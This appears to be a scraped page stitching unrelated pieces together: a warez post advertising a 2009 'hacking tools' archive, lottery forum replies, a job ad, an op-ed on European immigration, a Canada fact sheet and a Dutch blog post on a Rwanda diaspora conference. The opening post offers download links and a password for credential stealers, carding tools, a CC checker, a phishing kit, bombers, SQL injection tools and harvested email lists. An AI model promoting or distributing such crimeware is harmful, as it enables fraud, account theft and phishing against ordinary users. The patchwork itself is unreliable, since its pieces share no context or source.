http://depositfiles.com/en/files/yr3pwsuoa


Password:
The7thSage
          Usefull 2009 Hacking Tools & Tutorials   
Usefull 2009 Hacking Tools & Tutorials

info:
-----
All Parts Size is 5 MB


Hacking Tools
-------------

300 Emails Bomber
Active Perl
Carder Emailer
DosHttp
FireFox Stealer
Flooder
Gmail Hacker
JetSQL 2.0
MD5 Password Cracker
Msn Pass Stealer
Pangolin Professinal Edition
Pass Viewer
PrjSiteHack
CC Checker
Sms Bomber
SQL InjecTion & XSS TooLz
Wind Stealer
Xn Hashing Tool
Email Brute
CS Crypter
Phisher Maker
SQL Exploiter Pro v2.14


Hacking Tutorials
-----------------
Asp Sql Tutorial
Sql Injection Tutorial
CMS ORTUS Tutorial
Facebook flood
fake mail
megaupload trick
tips for rs download
vip carding


Other

150K Emal Leads
Shellz
Cookie Stealer Exploit
Adult 500K Emal Leads


Download Code:
http://rapidshare.com/files/299438173/Usefull_2009_Hacking_Tools___Tutorals.part01.rar
http://rapidshare.com/files/299440856/Usefull_2009_Hacking_Tools___Tutorals.part02.rar
http://rapidshare.com/files/299444307/Usefull_2009_Hacking_Tools___Tutorals.part03.rar
http://rapidshare.com/files/299457761/Usefull_2009_Hacking_Tools___Tutorals.part04.rar
http://rapidshare.com/files/299457762/Usefull_2009_Hacking_Tools___Tutorals.part05.rar
http://rapidshare.com/files/299457764/Usefull_2009_Hacking_Tools___Tutorals.part06.rar
http://rapidshare.com/files/299457765/Usefull_2009_Hacking_Tools___Tutorals.part07.rar
http://rapidshare.com/files/299457767/Usefull_2009_Hacking_Tools___Tutorals.part08.rar
http://rapidshare.com/files/299457768/Usefull_2009_Hacking_Tools___Tutorals.part09.rar
http://rapidshare.com/files/299457769/Usefull_2009_Hacking_Tools___Tutorals.part10.rar
http://rapidshare.com/files/299457770/Usefull_2009_Hacking_Tools___Tutorals.part11.rar
http://rapidshare.com/files/299457771/Usefull_2009_Hacking_Tools___Tutorals.part12.rar
          Cryptovirology   

Recent attacks exploiting a known vulnerability continue a downward spiral of ransomware-related incidents.


          Reply #44   
Look at the idea people......

Win D the Trapmaster. He's a character but always looking for the exploit. If you can track it, you can trap it.

TNtea. Vtracs. Mirrrors. Followers. 0 bring doubles and doubles brings 0s. Power trails (BobP)

destinycreation's TTT rundown. She mentions lottolaughs systems.

Yeah, pretty off the wall for me to mention geometric and pencil and paper workouts but understanding how they work and why they work is a good foundation for numbers.

Read idea peo... [ More ]
          Reply #18   
Thanks for the interest.

This is going to be a slow thread since I'm interested in how he determined his keys.

He had keys out to five.

I'm floundering at three. Then there is always the question if the Rule of Five was the result of an exploit he found or the result of the percentages of the game.

Either way, the keys work in Texas.

Downloaded Florida's draws for comparison.

If they work there its safe to say it doesn't matter if its an exploit due to the percentages, or in sp... [ More ]
          Multi-Source Support Specialist (Senior) - Wood Consulting - Kunia, HI   
Recent Digital Network Intelligence (DNI) a plus. Shall have demonstrated expertise in analyzing exploitation opportunities using intelligence reporting to...
From Wood Consulting - Sat, 22 Apr 2017 00:19:44 GMT - View all Kunia, HI jobs
          Europe's Politics of Victimology   

Europe today finds itself trapped in a posture of moral relativism that is undermining its liberal values. An unholy three-cornered alliance between Middle East dictators, radical imams who live in Europe, and Europe's traditional left wing is enabling a politics of victimology. This politics drives a culture that resists integration and adaptation, perpetuates national and religious differences, and aggravates such debilitating social ills as high immigrant crime rates and entrenched unemployment.

As one who once championed the utopian state of multicultural bliss, I think I know what I'm talking about. I was raised on the ideals of the 1960s, in the midst of the Cold War. I saw life through the lens of the countercultural turmoil, adopting both the hippie pose and the political superiority complex of my generation. I and my high school peers believed that the West was imperialistic and racist. We analyzed decaying Western civilization through the texts of Marx and Engels and lionized John Lennon's beautiful but stupid tune about an ideal world without private property: "Imagine no possessions/ I wonder if you can/ No need for greed or hunger/ A brotherhood of man/ Imagine all the people/ Sharing all the world."

It took me only 10 months as a young student in the Soviet Union in 1980-81 to realize what a world without private property looks like, although many years had to pass until the full implications of the central Marxist dogma became clear to me.

That experience was the beginning of a long intellectual journey that has thus far culminated in the reactions to the Mohammed cartoons. Politically, I came of age in the Soviet Union. I returned there in 1990 to spend 11 years as a foreign correspondent. Through close contact with courageous dissidents who were willing to suffer and go to prison for their belief in the ideals of Western democracy, I was cured of my wooly dreams of idealistic collectivism. I had a strong sense of the high price my friends were willing to pay for the very freedoms that we had taken for granted in high school -- but did not grasp as values inherent in our civilization: freedom of speech, religion, assembly, and movement. Justice and equality implies equal opportunity, I learned, not equal outcome.

Now, in Europe's failure to grapple realistically with its dramatically changing demographic picture, I see a new parallel to that Cold War journey. Europe's left is deceiving itself about immigration, integration, and Islamic radicalism today the same way we young hippies deceived ourselves about Marxism and communism 30 years ago. It is a narrative of confrontation and hierarchy that claims that the West exploits, abuses, and marginalizes the Islamic world. Left-wing intellectuals have insisted that the Danes were oppressing and marginalizing Muslim immigrants. This view comports precisely with the late Edward Said's model of Orientalism, which argues that experts on the Orient and the Muslim world have not depicted it as it is but as some dreaded "other," as exactly the opposite of ourselves -- and therefore to be rejected. The West, in this narrative, is democratic, the East is despotic. We are rational, they are irrational.

This kind of thinking gave birth to a distorted approach to immigration in countries like Denmark. Left-wing commentators decided that Denmark was both racist and Islamophobic. Therefore, the chief obstacle to integration was not the immigrants' unwillingness to adapt culturally to their adopted country (there are 200,000 Danish Muslims now); it was the country's inherent racism and anti-Muslim bias.

A cult of victimology arose and was happily exploited by clever radicals among Europe's Muslims, especially certain religious leaders like Imam Ahmad Abu Laban in Denmark and Mullah Krekar in Norway. Mullah Krekar -- a Kurdish founder of Ansar al Islam who this spring was facing an expulsion order from Norway -- called our publication of the cartoons "a declaration of war against our religion, our faith, and our civilization. Our way of thinking is penetrating society and is stronger than theirs. This causes hate in the Western way of thinking; as the losing side, they commit violence."

Inconvenient facts. The role of victim is very convenient because it frees the self-declared victim from any responsibility, while providing a posture of moral superiority. It also obscures certain inconvenient facts that might suggest a different explanation for the lagging integration of some immigrant groups -- such as the relatively high crime rates, the oppression of women, and a tradition of forced marriage.

Dictatorships in the Middle East and radical imams have adopted the jargon of the European left, calling the cartoons racist and Islamophobic. When Westerners criticize their lack of civil liberties and the oppression of women, they say we behave like imperialists. They have adopted the rhetoric and turned it against us.

These events are occurring against the disturbing backdrop of increasingly radicalized Muslims in Europe. Mohammed Atta, the 9/11 ringleader, became a born-again Muslim after he moved to Europe. So did the perpetrators behind the bombings in Madrid and London. The same goes for Mohammed Bouyeri, the young Muslim who slaughtered filmmaker Theo van Gogh in Amsterdam. Europe, not the Middle East, may now be the main breeding ground for Islamic terrorism.

What's wrong with Europe? For one thing, Europe's approach to immigration and integration is rooted in its historic experience with relatively homogeneous cultures. In the United States one's definition of nationality is essentially political; in Europe it is historically cultural. I am a Dane because I look European, speak Danish, descend from centuries of other Scandinavians. But what about the dark, bearded new Danes who speak Arabic at home and poor Danish in the streets? We Europeans must make a profound cultural adjustment to understand that they, too, can be Danes.

Another great impediment to integration is the European welfare state. Because Europe's highly developed, but increasingly unaffordable, safety nets provide such strong unemployment insurance and not enough incentive to work, many new immigrants go straight onto the dole.

While it can be argued that the fast-growing community of about 20 million Muslim immigrants in Europe is the equivalent of America's new Hispanic immigrants, the difference in their productivity and prosperity is staggering. An Organisation for Economic Co-operation and Development study in 1999 showed that while immigrants in the United States are almost equal to native-born workers as taxpayers and contributors to American prosperity, in Denmark there is a glaring gap of 41 percent between the contributions of the native-born and of the immigrants. In the United States, a laid-off worker gets an average of 32 percent compensation for his former wages in welfare services; in Denmark the figure is 81 percent. A culture of welfare dependency is rife among immigrants, and taken for granted.

What to do? Obviously, we can never return to the comfortable monocultures of old. A demographic revolution is changing the face, and look, of Europe. In an age of mass migration and the Internet, cheap air fares and cell phones everywhere, cultural pluralism is an irreversible fact, like it or not. A nostalgic longing for cultural purity -- racial purity, religious purity -- easily descends into ethnic cleansing.

Yet multiculturalism that has all too often become mere cultural relativism is an indefensible proposition that often justifies reactionary and oppressive practices. Giving the same weight to the illiberal values of conservative Islam as to the liberal traditions of the European Enlightenment will, in time, destroy the very things that make Europe such a desirable target for migration.

Europe must shed the straitjacket of political correctness, which makes it impossible to criticize minorities for anything -- including violations of laws, traditional mores, and values that are central to the European experience. Two experiences tell the tale for me.

Shortly after the horrific 2002 Moscow musical theater siege by Chechen terrorists that left 130 dead, I met with one of my old dissident friends, Sergei Kovalev. A hero of the human rights movement in the old Soviet Union, Kovalev had long been a defender of the Chechens and a critic of the Russian attacks on Chechnya. But after the theater massacre he refused, as always, to indulge in politically correct drivel about the Chechens' just fight for secession and decolonization. He unhesitatingly denounced the terrorists, and insisted that a nation's right to self-determination did not imply a free ticket to kill and violate basic individual rights. For me, it was a clarifying moment on the dishonesty of identity politics and the sometime tyranny of elevating group rights above those of individuals -- of justifying the killing of innocents in the name of some higher cause.

The other experience was a trip I made in the 1990s, when I was a correspondent based in the United States, to the Brighton Beach neighborhood of Brooklyn, N.Y. There I wrote a story about the burgeoning, bustling, altogether vibrant Russian immigrant community that had arisen there -- a perfect example of people retaining some of their old cultural identity (drinking samovars of tea, playing hours of chess, and attending church) while quickly taking advantage of America's free and open capitalism to establish an economic foothold. I marveled at America's ability to absorb newcomers. It was another clarifying moment.

An act of inclusion. Equal treatment is the democratic way to overcome traditional barriers of blood and soil for newcomers. To me, that means treating immigrants just as I would any other Danes. And that's what I felt I was doing in publishing the 12 cartoons of Mohammed last year. Those images in no way exceeded the bounds of taste, satire, and humor to which I would subject any other Dane, whether the queen, the head of the church, or the prime minister. By treating a Muslim figure the same way I would a Christian or Jewish icon, I was sending an important message: You are not strangers, you are here to stay, and we accept you as an integrated part of our life. And we will satirize you, too. It was an act of inclusion, not exclusion; an act of respect and recognition.

Alas, some Muslims did not take it that way -- though it required a highly organized campaign, several falsified (and very nasty) cartoons, and several months of overseas travel for the aggrieved imams to stir up an international reaction.

Maybe Europe needs to take a leaf -- or a whole book -- from the American experience. For a new Europe of many cultures that is somehow a single entity to emerge, as it has in the United States, will take effort from both sides -- the native-born and the newly arrived.

For the immigrants, the expectation that they not only learn the host language but also respect their new countries' political and cultural traditions is not too much to demand, and some stringent (maybe too stringent) new laws are being passed to force that. At the same time, Europeans must show a willingness to jettison entrenched notions of blood and soil and accept people from foreign countries and cultures as just what they are, the new Europeans.


          Canada Quick Facts   
Canada is huge. It spans six time zones from 'Sea to Sea to Sea' and is the world's second largest country with an area of 9, 970, 610 square kilometres (3, 849,656 square miles).

Canada is huge. It spans six time zones from "Sea to Sea to Sea" and is the world's second largest country with an area of 9, 970, 610 square kilometres (3, 849,656 square miles).

Borders:

Canada is surrounded by three oceans - the Pacific Ocean to the west, the Atlantic Ocean to the east and the Arctic Ocean to the north. To the south is the United States of America, which shares almost 9,000 kilometres of undefended border with Canada.

Provinces and Territories:

Ottawa, located in the province of Ontario, is the capital of Canada. Canada consists of ten provinces and three territories, each with its own capital city:

Alberta - Edmonton

British Columbia - Victoria

Manitoba - Winnipeg

New Brunswick - Fredericton

Newfoundland & Labrador - St. John's

Northwest Territories - Yellowknife

Nova Scotia - Halifax

Nunavut - Iqaluit

Ontario - Toronto

Prince Edward Island - Charlottetown

Quebec - City of Québec

Saskatchewan - Regina

Yukon Territory - Whitehorse

Population:

30,750,100 people living in Canada

Distribution: 77% urban, 23% rural

Indigenous Peoples: North American Indian 69%, Métis 26%, Inuit 5%

Official Languages: English and French

Languages Spoken: English 59%, French 23%, Other 18%
For detailed Canadian Statistics check the Statistics Canada Web site.

Political System:

Canada is a federal parliamentary democracy with a constitutional monarchy. The Canadian parliamentary system is modeled after the British form of government and consists of the Crown, Senate and House of Commons.

The Crown, or Queen, is the traditional Head of State who is represented in Canada by the Governor General. The Crown delegates authority to the Governor General, who acts on her behalf in a mostly symbolic role as the Head of State. The office of the Governor General is one of Canada's oldest institutions, dating back almost 400 years.

The Senate, or Upper House, consists of 105 members appointed by the Governor General upon the advice of the Prime Minister. The Senate and House of Commons share similar authorities, but only the House of Commons can introduce financial legislation. The House of Commons, or Lower House, is the primary legislative body of Parliament representing 301 Canadian electoral districts.

Every five years voters elect local members to the House of Commons and the political party with the most representatives forms the government. The party leader becomes the Head of Government or Prime Minister; The Right Honourable Paul Martin is the current and twentieth-first Prime Minister.

Get detailed information about the history and function of Parliament. Learn more about the office of the Prime Minister or role of the Governor General.

National Emblem

Historically, Canada's most important national emblem has been the maple leaf. The maple leaf, in variant forms and colours, has appeared on the penny, Canadian coats of arms and regimental banners. In 1965 the maple leaf became the central design on the Canadian national flag. The red maple leaf is recognized world-wide as a Canadian symbol.

Visit the Canadian Heritage Web site for more details about the national flag.

The Canadian Heritage Web site offers detailed information about other Canadian Symbols.

National Anthem of Canada

O Canada!
Our home and native land!
True patriot love
in all thy sons command.

With glowing hearts
we see thee rise,
The True North strong and free!
From far and wide,
O Canada,
we stand on guard for thee.

God keep our land
glorious and free!
O Canada,
we stand on guard for thee.

O Canada,
we stand on guard for thee.

French Version

O Canada! Terre de nos aïeux,
Ton front est ceint de fleurons glorieux!

Car ton bras sait porter l'épée,
Il sait porter la croix!

Ton histoire est une épopée
Des plus brillants exploits.

Et ta valeur, de foi trempée,
Protégera nos foyers et nos droits.

Protégera nos foyers et nos droits.

Culture and Language

Canada's culture and official language policy are features that are unique to Canada. To learn more about culture, languages, education, communications and economy in Canada, take a look at the Canadian profile on the Canadian Heritage Web site.

Geography and Climate:

Canada's climate varies throughout the country. Each region experiences variable temperature and precipitation levels, although most of Canada experiences four distinct seasons.

*Spring — Average temperature = 15 degrees Celsius

*Summer — Average temperature = 25 degrees Celsius

*Fall — Average temperature = 15 degrees Celsius

*Winter — Average temperature = -25 degrees Celsius

Like its climate, Canada has a diverse geography that varies regionally. Canada encompasses several geographical elements - from Arctic tundra in the north, lush rain forests in the west, the Prairie wheat fields in central Canada, to the rugged coastlines of the Atlantic and Pacific provinces.

Canada has several distinct geographic and climatic regions:

The Pacific or West Coast — enjoys Canada's most favourable climate. The warm Pacific Ocean air produces a temperate rain forest climate. The winters, although mild, include significant precipitation - particularly in southern British Columbia. The northern and interior regions, however, experience heavy snowfall.

The Cordillera or Cordilleran mountain range, extends from British Columbia to Alberta and as far north as the Yukon. The Cordillera include the Coastal Range, the Rockies and St. Elias Mountains.

The Prairies — encompass the provinces of Manitoba, Saskatchewan and Alberta from east to west. The Prairies, considered world leaders in grain production, are famous for their seemingly endless fields of grain.

Prairie summers are hot and dry with little precipitation. Levels of precipitation vary somewhat across the region however, with annual rates ranging from 300 to 500 mm. The "chinook" winds of the Prairies counteract the long, cold winters producing milder temperatures, sometimes as much as 20 degrees in a matter of hours.

The Great Lakes/St. Lawrence Region — is home to half of Canada's population. Summer temperatures average 20 degrees Celsius, but may feel considerably warmer with the humidity. Winters in this region are typically cold with heavy snowfall.

This area has some of the best agricultural land in Canada. It is suitable for growing a wide variety of fruits and vegetables. The Niagara Peninsula region produces several quality wines. Maple syrup and sugar are other products of the Great Lakes region.

The Atlantic or Maritime Region — experiences high levels of precipitation throughout the year due to the proximity of the Atlantic Ocean. The winters are characteristically cold with heavy periods of snowfall. During the summer temperatures may range from 16 to 18 degrees Celsius. Fog is prevalent in some Atlantic areas, particularly in the spring and summer.

The North or Arctic Regions — is blanketed in snow much of the year. A northern summer consists of four months of perpetual sunlight with temperatures reaching 10 to 20 degrees Celsius, in the arctic and sub-arctic respectively. The summer permafrost allows for the growth of vegetative life. The long, cold winters, with very few hours of daylight, are brightened by The Northern Lights or Aurora Borealis.

For more information about the Canadian climate, visit the Environment Canada Web site.

Like many large countries, Canada has several time zones. Canada uses six Standard Time Zones and observes Daylight Savings Time in every province but Saskatchewan.


National Parks and National Historic Sites:

In 1885, the Canadian government established the first national park in Banff, Alberta. Today, there are more than forty National Parks that occupy approximately 2 percent of Canada's total landmass. Canada's National Park system is monitored and protected by Parks Canada. All levels of government recognize the urgency of preserving the ecological integrity of Canada's parks for generations to come.

In addition, Parks Canada and Canadian Heritage strive to commemorate the people, places and events of national historic significance. Canada has designated more than 800 National Historic Sites throughout the country. These sites represent the variety of Canada's unique history, culture and people.

Canada is also home to thirteen UNESCO World Heritage Sites. Countries worldwide share the responsibility of preserving sites of ecological or biological universal importance.

          Diaspora Conferentie   
Plotseling verscheen het ergens op mijn netvlies. Op 5 en 6 november was er een bijeenkomst in Den Haag onder de titel ‘Diaspora Conferenceon the Great Lakes region: Root causes of conflict and opportunities for change’. Georganiseerd door The Hague Peace Projects. Toegang: gratis. Plaats: Institute for Social Studies in Den Haag. Op 5 november stond er niets op mijn agenda en een van de sprekers was Filip Reyntjes, een expert op het Grote Meren gebied. Het leek me wel eens interessant om hem te zien spreken.


Het zou om half tien beginnen met een introductie. Dat kon ik net niet halen. Maar net voordat de eerste spreker om tien uur zou beginnen ben ik de zaal binnengegaan en heb ik zitten luisteren. De eerste spreker was Jagoda Paukovic. Zij hield een heel betoog over allerlei oorzaken voor conflict. Haar praatje was wel erg algemeen. Ik had zo ook een hele riedel kunnen opnoemen. Natuurlijk komt dan ter sprake hoe een land omgaat met zijn natuurlijk hulpbronnen, hoe er omgegaan wordt met terugkerende vluchtelingen, hoe er omgegaan wordt met landrechten en nog veel meer.


De tweede spreker was Ben Rutabana. Hij werd aangekondigd als zanger, schrijver, activist. Hij hield een heel persoonlijk verhaal over zijn geschiedenis. Hij kwam uit Rwanda en was Tutsi. Zijn jongste herinneringen zijn die van angst. Dat hij als 3-jarige zich moest verbergen in de bossen om te voorkomen dat hij zou worden gedood. Hij heeft gezien dat de huizen van Tutsi’s in brand werden gestoken. Hij kon zich herinneren dat men blij was dat in 1973 er nieuw regiem aan de macht kwam met nieuwe hoop. Maar deze hoop was van korte duur. Niet lang daarna begonnen de Hutu’s de Tutsi’s te zien als kakkerlakken, als minderwaardig en dat ze eigenlijk niet thuis hoorden in Rwanda. En het ergste vond hij dat de Tutsi’s die ook gingen accepteren. Als 21-jarige heeft jij zes maanden in de gevangenis gezeten en is toen gemarteld, alleen omdat hij Tutsi was. Daarna heeft hij zich aangesloten bij de RPF. Daar heeft hij van alles meegemaakt. Hij was blij dat er in 1994 een einde is gekomen aan Hutu power en dat vanaf die tijd de Tutsi’s aan de macht zijn gekomen. Maar ook deze blijdschap was van korte duur. Hij zag dat het nieuw regiem hele slechte kanten had. Ook onder het huidige regiem heeft hij zes maanden gevangen gezeten. Wederom is hij gemarteld, deze keer gewoon ergens in een huis in Kigali. Ik heb niet goed meegekregen waarom hij is gearresteerd. Als slot van zijn betoog vraagt hij zich af of de huidige regering nu voor zichzelf bezig is of voor het volk. Ik denk dat dit voor hem een retorische vraag is. Het was in ieder geval een heel indrukwekkend verhaal.


Een bijzonder detail waar hij zich druk over maakt is het laten zien van de lijken van de slachtoffers van de genocide. Die heb ik inderdaad ook in Rwanda wel gezien. Het meest indrukwekkend zijn de skeletten, in gebluste kalk bewaard, die in grote hoeveelheden zijn tentoongesteld in Murambi. Zijn moeder is één van de slachtoffers en hij wil haar eigenlijk graag begraven. Dat is Rwandese cultuur. Een persoon kan geen rust krijgen totdat deze wordt begraven. Hij vindt dat de regering de lijken gebruikt als propaganda voor haar standpunt om de genocide blijvend onder de aandacht te brengen. Om de schuldigen te blijven laten voelen wat ze hebben gedaan. Dit is in zijn eigen voorbeeld dat de regering niet handelt in het belang van de bewoners, want die willen de lijken begraven, maar in het belang van zichzelf. Om te blijven regeren.

Halverwege tijdens zijn betoog ben ik even iets naar voren gelopen om een foto te maken. Dat viel niet in goede aarde. Ik kreeg een bestraffende blik toegeworpen van een mevrouw aan de zijkant met de insteek dat dat echt niet de bedoeling was. Na de pauze werd hier nog even op teruggekomen. Het was niet toegestaan om foto’s te maken en om via sociale media tijdens de conferentie hier over iets te vertellen. De reden is dat het hier om vertrouwen ging en dat er vertrouwelijke informatie werd gedeeld en dat niet iedereen dan in staat zou zijn om te zeggen wat men werkelijk vond. Ik vond het allemaal wel wat overdreven, zeker ten aanzien van de sprekers. Deze hebben er toch voor gekozen om te gaan spreken en lijken me dan ook zeker niet bang om hun mening te geven. Het deed mij toch al wel weer een beetje denken aan de geheimzinnigheid die er heerste bij bijvoorbeeld een Rwanda Day.

In de koffiepauze kwam ik in gesprek met iemand die me herkende van Rwanda Day. Het leek wel een deja vu. Overal waar ik kom word ik herkend van een vorige bijeenkomst. Ik vond het wel grappig om hem hier zo te zien. Op Rwanda Day is de loftrompet gestoken over Rwanda. Op deze dag zal er heel wat kritischer over Rwanda worden gesproken. Is hij gewoon geïnteresseerd of is het een soort spion van het andere kamp om te weten te komen wat er gezegd wordt en vooral door wie? Misschien toch een reden om op te passen met foto’s en sociale media? Of krijg ik nu ook als last een gezonde hoeveelheid paranoia?


Na de koffiepauze was het woord aan Filip Reyntjes. Hij had een heel betoog over de oorzaken van de ellende in het Grote Meren gebied. De eerste en belangrijkste reden is de zwakte van de staat Zaïre en later Congo. Hij verduidelijkt dat met anekdotes. Hij sprak met een militair en vroeg aan hem waar de rebellen waren. Het antwoord was, iets verderop, op die heuvels. Vervolgens vroeg hij wanneer die zouden worden verjaagd. Het antwoord daarop was dat dat niet ging gebeuren. Nee, de rebellen bleven daar en de militairen bleven hier. Het is net of ze niet eens hun best deden om een staat te zijn. Al was hij uiteindelijk toch wel positief. Dat de staat nu niet meer zo zwak is als twintig jaar geleden. Er is dus vooruitgang.

De tweede oorzaak die hij opvoerde was territoriale expansie van de buurlanden Rwanda en Uganda. Die hebben hun oorlog tegen hun eigen rebellen uitgebreid tot in Congo. Ook de wisselende alliantie tussen de verschillende landen heeft het er niet beter op gemaakt. Rwanda en Uganda vochten eerst zij aan zij, maar later kwamen ze tegenover elkaar te staan.

De winstgevendheid van oorlog voeren is ook een factor. Normaal gesproken kost een oorlog geld. De oorlog in Congo bracht echter geld op, doordat er geprofiteerd is van de grondstoffen in het oosten van dat land. Tenslotte legde hij ook de nadruk op de straffeloosheid van met name de RPF in Rwanda. Dat in dat land alleen de verliezers zijn gestraft, maar dat de misdaden van de overwinnaars totaal niet worden vervolgd.

Aan het eind van het betoog werd het toch wel wat duidelijker. Ja, inderdaad Congo heeft het deels aan zichzelf te danken dat het daar zo’n puinhoop is, dus daar moet ook wat gebeuren. Maar de meest pijlen zijn uiteindelijk wel gericht op Rwanda. Dat is de grote pestkop op het schoolplein, die het arme Congo maar zit te pesten. Al vraagt slachtoffer Congo er ook wel een beetje om.

Aan het slot waagde hij zich ook nog een soort van voorspelling. Hij was zeer sceptisch over de toekomst van Rwanda. Het lijkt allemaal zo stabiel, maar onder de oppervlakte rommelt het. Verder zijn er heel veel vluchtelingen uit Burundi in Rwanda en dat zorgt voor veel onrust. Hij vreesde dat Rwanda een inval gaat doen in Burundi om orde op zaken te stellen, maar dat zal als gevolg hebben dat Tanzania Rwanda zal aanvallen, omdat de situatie tussen deze twee landen al heel lang verre van ideaal is.

Het was tijd voor vragen, vooral voor Ben een ook voor Filip. Voor Jagoda kwamen geen vragen. Geen wonder, dat was ook zo nietszeggend. De leider van de conferentie wilde nog wel even een dankwoord uitspreken aan de sprekers op de conferentie. Want ze hadden heel veel mensen gevraagd om te komen praten, maar heel veel mensen hebben nee gezegd. Hoe moest ik deze opmerking duiden? Hebben we hier nu te maken met derderangs sprekers, of betekend het inderdaad dat andere mensen niet durven komen?

De gelegenheid om vragen te stellen wordt vaak niet alleen benut door echte vragen te stellen. Dat geeft ook een podium aan mensen die iets kwijt willen. De eerste vragensteller viel dan ook in deze categorie. Hij stelde dat Rwanda een land van angst is. Dat er in Rwanda al meer dan 100 conflicten hebben plaatsgevonden, waarvan de genocide er één is. De genocide is dan ook niet de oorzaak van de huidige toestanden, het is een gevolg. De oorzaak van alle conflicten zit in de geschiedenis. Voordat hij verder kan gaan wordt hij afgebroken om andere vragenstellers ook de kans te geven om een vraag te stellen.

De volgende vragensteller vraagt aan Ben waarom hij zich introduceerde als Tutsi en niet als Rwandees. En of hij instemde met de officiële benaming van de genocide, namelijk dat het een ‘genocide against the Tutsi’ wordt genoemd. Ben kan instemmen met de officiële term en hij weet dat er door het huidige regiem ook misdaden zijn gepleegd, maar zo lang niet bewezen is dat dat een genocide is geweest, zal hij het niet als zodanig benoemen. Hij wil ook nog wel benadrukken dat hij, terwijl hij een Tutsi is, bedreigd wordt door Tutsi’s. De klassieke tegenstelling Tutsi’s tegen Hutu’s is in zijn ogen achterhaald. Op dit moment zijn de grootste tegenstanders van het regiem vaak Tutsi’s, die op een of andere manier niet meer kunnen instemmen met de huidige gang van zaken. Als gevolg daarvan worden er in het buitenland nu Rwandezen vermoord, ontvoerd of een andere wijze lastig gevallen.

Filip geeft hier nog een aanvulling op. Hij stemt ook in met de benaming ‘genocide against the Tutsi’ omdat bewezen is er doelgericht geprobeerd is een bepaalde groep te elimineren. Hij voegde er aan toe dat in zijn ogen in de jaren na 1994 door de RPF in Congo een genocide is gepleegd tegen de Hutu’s. In zijn ogen is daar genoeg bewijs voor. Ik kan me voorstellen dat hij door dit soort uitspraken niet heel erg geliefd is in Rwanda.

Als laatste zegt hij nog iets over de vergelijking tussen Rwanda en Burundi. In Rwanda heeft men ervoor gekozen om de etniciteit te gaan ontkennen. Iedereen is Rwandees en niemand is meer Hutu of Tutsi. Dat werkt niet, omdat iedereen onderhuids nog weet wat hij of zij is en nog belangrijker dat ook weet van ieder ander. In Burundi is men nog openlijk Hutu of Tutsi, met als gevolg dat het onderscheid op etniciteit daar veel minder een rol speelt. Daar is wel een hoop onrust en daar vallen ook veel doden bij, maar dat wordt niet veroorzaakt door etniciteit. Of je daar nu zo blij van moet worden, dat weet ik dan ook niet.

In ieder geval was het tijd voor de lunch. Dat was voortreffelijk verzorgd en ik liet me de broodjes dan ook goed smaken. Ondertussen nog wat luchtige conversatie met de diverse deelnemers.

Na de pauze gingen we de verdieping in een kleinere groep. Je kon kiezen voor een Nederlandstalige, een Engelstalige en Franstalige groep. Ik koos voor de Engelstalig en dat deden nog zo’n 15 andere mensen. We begonnen met een voorstelrondje. Het gezelschap bleek voor de ongeveer de helft uit Rwandezen te bestaan en de andere helft betrof Nederlanders die op de een of andere manier een link met Rwanda hadden. Het was dus eigenlijk een heel Rwandees gezelschap. De discussie spitste zich dan ook meteen toe op Rwanda.

Een deelnemer ging van start en somde op waar het volgens hem om ging: Afkomst, macht, etniciteit en land. En dat laatste schakelde hij gelijk met rijkdom. Hij suggereerde dan ook dat het voor sommige mensen nooit genoeg is. Die willen altijd meer land en rijkdom, waaronder de president, die heeft onlangs iemand laten vermoorden omdat hij uit was op zijn rijkdom.

De discussie spitste zich op de een of andere manier toe op land. Door informatie van verschillende deelnemers kregen we in ieder geval steeds een beter overzicht. Met behulp van het kadaster uit Nederland is ook al het land in Rwanda in kaart gebracht. Het gaat om 12 miljoen stukjes land die verdeeld zijn over 11 miljoen inwoners. Dit land blijft eigendom van de overheid, maar is nu voor 90 jaar verpacht aan inwoners van het land. Hierbij zijn wel kanttekeningen te maken.

Als je het land niet gebruikt, dan vervalt je recht op pacht. Probleem daarbij is dat sommige mensen gewoon niet genoeg geld hebben om het land te gaan verbouwen. Als de overheid het land nodig heeft voor een andere bestemming, dan kan je pacht ook vervallen. Je krijgt dan wel een compensatie, maar die zal altijd natuurlijk veel te weinig zijn. Voor sommige gebieden geeft de overheid aan welk gewas je er moet verbouwen. In het noorden moet je bijvoorbeeld verplicht pyrethrum te verbouwen dat je vervolgens alleen kan verkopen aan het bedrijf Horizon, dat dan weer gelieerd is aan de overheid. Als gevolg daarvan is de opbrengst van dit land veel minder dan de pachter had verwacht.

De schaarste van het land in combinatie met de groeiende bevolking kwam ter plaatse. Is er nog genoeg land voor iedereen in de toekomst? Idealiter zouden jongeren gaan verhuizen naar de stad om daar in appartementen te gaan wonen. Maar daar is nog een hele omslag in cultuur nodig. Een stuk land en een koe geeft hen identiteit. Iemand die in een flat in de stad woont, heeft geen identiteit.

Het land is dan wel in kaart gebracht door het kadaster, maar dat wil niet zeggen dat alle problemen daardoor zijn opgelost. Weeskinderen als gevolg van de genocide worden nu meerderjarig en ontdekken dat een oom het land van hun ouders in gebruik heeft. Hoe wordt dit afgehandeld als dit wordt behandeld in een rechtzaak?

Door iemand werd als probleem ervaren dat er regelmatig in opdracht van de overheid land werd verkocht aan buitenlandse investeerders. En laat er nu juist zo’n investeerder in onze groep zitten. Zijn bedrijf had 10.000 hectare land gekocht in Rwanda. Hij zat er ook met hele goede bedoelingen. Hij herkende alle problemen die ter sprake kwamen. Hij vond dat het in Rwanda goed was geregeld in tegenstelling tot andere landen. Zijn organisatie moest in Rwanda betalen voor een stuk land, in Uganda kregen ze het vaak zo maar voor niets. In zijn ogen wordt er in Rwanda eerlijker zaken gedaan. Hij hoopte ook dat de verkoper van het land zo genoeg geld kreeg voor zijn land, dat ze op deze manier naar de stad zouden vertrekken. Ze hadden goed overleg gevoerd met Executive Secretary van de Sector over de verkoop van het land aan hun organisatie. Niet helemaal duidelijk werd wat er nu precies gebeurde op dat stuk land. Ze gingen het voor 20 jaar exploiteren en boden tegelijkertijd ook banen aan via coöperaties, waarschijnlijk om het land te bewerken. Na 20 jaar was het de bedoeling om het land te schenken aan deze coöperaties. Ik denk dat deze investering met de allerbeste bedoelingen is opgezet en misschien gaat het ook wel werken. Toch kon je ook bij de rest van de groep wel bedenkingen merken of het in werkelijkheid gaat uitwerken zoals het bedoeld was.
